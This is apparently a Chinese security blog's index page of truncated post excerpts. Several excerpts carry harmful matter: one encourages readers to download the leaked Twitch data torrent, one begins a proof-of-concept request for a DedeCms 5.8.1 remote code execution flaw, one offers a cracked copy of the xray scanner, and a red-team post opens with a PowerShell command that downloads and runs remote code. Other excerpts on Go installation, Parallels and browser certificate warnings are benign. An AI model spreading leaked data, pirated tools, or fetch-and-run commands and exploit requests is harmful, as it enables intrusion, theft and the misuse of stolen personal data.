重点：数据泄露.

疑似  Twitch.tv  的数据，根据种子名称看只是流露出的第一部分。各位自行下载斟酌。

下载方法在 之前的这篇文章说过了，不重复。

目录内容以及大小如下：

└── [5.1K]  twitch-leaks-part-one
    ├── [ 15K]  3rdparty.zip
    ├── [ 16M]  CPE-Chef.zip
...

昨天在一个老外的博客看到了他的一篇文章，讲的就是DedeCms 的预览版本 V5.8.1 存在 RCE 漏洞（远程代码执行漏洞）；我刚刚复现了下，确实是存在的。

POC：

GET /plus/flink.php?dopost=save&c=pwd HTTP/1.1
Host: dedecms.test
Pragma: no-cache
Cache-Control: n...

前言：

自己的服务器，或者是朋友的服务器，每次想编译 golang 的程序的时候，总是按照既定的步骤去官网下载-解压-安装-添加到环境变量里面，重复的劳动还是恼火。遂想自己写个安装脚本，但是在浏览 github 的时候，发现已经有人写好了的脚本，那就是 update-golang 。

简介：

update-golang 是国外的一些工程师写的一个安装 golang 或...

因为底层修改的原因，Parallels Desktop 15 无法在Big Sur上运行，最新的 Parallels Desktop 16 （有钱推荐正版，无此问题）在 Big Sur 下运行会有无法联网的问题，会提示“您的虚拟机将继续正常运作 但将无法连接网络。”，以及使用USB也会有问题。

一段时间都无法解决此问题，最新网上有一个别致的解决方案，可通过终端代码来启动Paralle...

前言：

有的时候我们访问某些网站，特别是对于证书过期或者是证书和域名不符合的时候，会提示：警告：面临潜在的安全风险！

Firefox 检测到潜在的安全威胁，因此没有继续访问 www.xxxx.com。若您访问此网站，攻击者可能会尝试窃取您的密码、电子邮件、信用卡等信息。

您可以做什么？

这个问题大多与网站有关，无法通过您的操作解决。您可以向此网站的管理者反馈此问题。
...

点进来的人也是想下载，不明白的就看 Anonymous 原文：

*****************************************************************************************
________                                     __   .__
\_____  \  _____...

首先感谢 长亭科技 提供 xray这款非常方便非常好用的安全工具

俗话说：没有人破解的工具不是好工具

根据没有任何数据支持的统计，大部分安全研究人员使用的安全工具都是盗版 包括但不限于： IDA\JEB\BurpSuite\Vmware

截至目前xray最新版的 1.4.2 crackedversion

MD5值：

文件: xray_windows_am...

简单的介绍下禅道：

禅道 项目管理软件 是国产的开源项目管理软件，专注研发项目管理，内置需求管理、任务管理、bug管理、缺陷管理、用例管理、计划发布等功能，实现了软件的完整生命周期管理。

首先搭建环境，安装禅道12.4.2，开源版下载：https://www.zentao.net/dynamic/zentaopms12.4.2-80263.html 。

我在Mac上使...

在上篇，我们说过红队技巧：隐藏windows服务，今天抽空来更新下，如何查找这类隐藏的Windows服务项。 首先看下效果，使用powershell远程下载执行直接获得隐藏的Windows服务名称：

powershell -c "IEX (New-Object Net.WebClient).DownloadString('h...